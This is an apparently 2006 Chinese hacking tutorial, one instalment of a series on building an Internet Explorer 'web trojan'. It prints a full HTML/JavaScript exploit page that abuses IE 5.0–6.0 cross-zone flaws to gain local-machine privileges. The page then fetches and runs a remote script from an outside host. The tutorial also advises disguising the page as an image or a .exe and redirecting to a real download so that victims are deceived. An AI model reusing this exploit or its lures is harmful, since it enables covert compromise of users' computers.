你也可以当黑客 打造完美的IE网页木马
2006-11-07 20:09:47 来源:WEB开发网核心提示: 接下来我们就要利用一个小小跨域执行漏洞,来获得“我的电脑”域的网页权限,你也可以当黑客 打造完美的IE网页木马(4),大家以前是不是和我一样觉得这种漏洞仅仅只能用来进行跨站脚本攻击,得到COOKIE之类的东东呢?这次它终于可以露脸啦!代码如下:<HTML>
接下来我们就要利用一个小小跨域执行漏洞,来获得“我的电脑”域的网页权限,大家以前是不是和我一样觉得这种漏洞仅仅只能用来进行跨站脚本攻击,得到COOKIE之类的东东呢?这次它终于可以露脸啦!代码如下:
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<TITLE>冰狐浪子网络技术实验室的完美IE网页木马</TITLE>
</HEAD>
<BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0">
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
<SCRIPT LANGUAGE="javascript">
//此处设置上面icyfox.js文件的网络地址
//请把http://www.godog.y365.com/wodemuma/icyfox.js改为你的icyfox.js文件实际上传地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(///g,'//');
WIE=navigator.appVersion;
if(WIE.indexOf("MSIE 5.0")>-1){
/*IE 5.0利用iframe标签,src属性设为icyfox://则会使此标签具备“我的电脑”域的权限,原因是因为icyfox://是不存在的协议,所以会IE会利用res://协议打开SHDOCLC.DLL中的语法错误页syntax.htm,而且SHDOCLC.DLL又位于系统目录中,为在 icyfox.js中得到WINDOWS系统目录和系统盘提供数据;*/
document.write("<iframe style='display:none;' name='icyfoxlovelace' src='icyfox://'></iframe>");
setTimeout("muma0()",1000);
}
else {
/*IE5.5、 IE6.0则利用_search漏洞,把打开的地址设为icyfox://,从而使_search搜索框具备“我的电脑”域的权限,因为在IE6.0中无法用上面的iframe漏洞,IE5.5应该可以用,我没有测试。这样做的结果会打开搜索栏,有点遗憾!*/
window.open("icyfox://","_search");
setTimeout("muma1()",1000);
}
//下面利用file:javascript:协议漏洞在已是我的电脑”域的权限的“icyfox://”中插入icyfox.js脚本并运行
function muma0(){
window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","icyfoxlovelace");
}
function muma1(){
window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","_search");}
</SCRIPT>
</BODY>
<NOSCRIPT><iframe style="display:none;" src='*.*'></iframe></NOSCRIPT>
</HTML>
把上面的代码保存为icyfox.htm,如果你愿意可以把扩展名改为jpg并在网页中加入一个精美的图片背景,来做一个图片木马,甚至你可以改为 exe,来冒充一个好的程序的下载地址,并在网页的<HEAD></HEAD>中加入标签<meta http-equiv="refresh" content="5;url='http://www.godog.y365.com/winrar.exe'">来定时转到另一个真正的程序下载地址,从而更好的欺骗别人。
[]
赞助商链接